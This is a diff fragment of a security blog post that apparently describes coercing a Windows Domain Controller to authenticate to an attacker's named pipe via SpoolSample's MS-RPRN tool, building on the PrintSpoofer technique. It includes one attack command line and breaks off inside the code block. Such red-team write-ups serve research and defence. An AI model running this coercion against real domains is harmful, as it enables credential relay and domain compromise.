S3cur3Th1sSh1t/S3cur3Th1sSh1t.github.io/_posts/2021-04-19-Named-Pipe-PTH.md

 ---

-<a href="https://twitter.com/itm4n">@itm4n's</a> article about  PrintSpoofer - <a href="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/">https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/</a> - I also had the idea and tested, if it's possible to relay a Domain Controllers Computer-Account Hash to our Named Pipe via Spoolsample.
+Having <a href="https://twitter.com/itm4n">@itm4n's</a> article about  PrintSpoofer - <a href="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/">https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/</a> - in mind, I also had the idea, if it's possible to relay a Domain Controllers Computer-Account Hash to our Named Pipe via Spoolsample.
 This can be done with the MS-RPRN part of the <a href="Spoolsample code">https://github.com/leechristensen/SpoolSample/tree/master/MS-RPRN</a> by using `/` instead of `\` for the target system like this:

 ```batch
 MS-RPRN.exe \\DomainControllerFQDN \\OutCompromisedSystemFQDN/pipe/pipename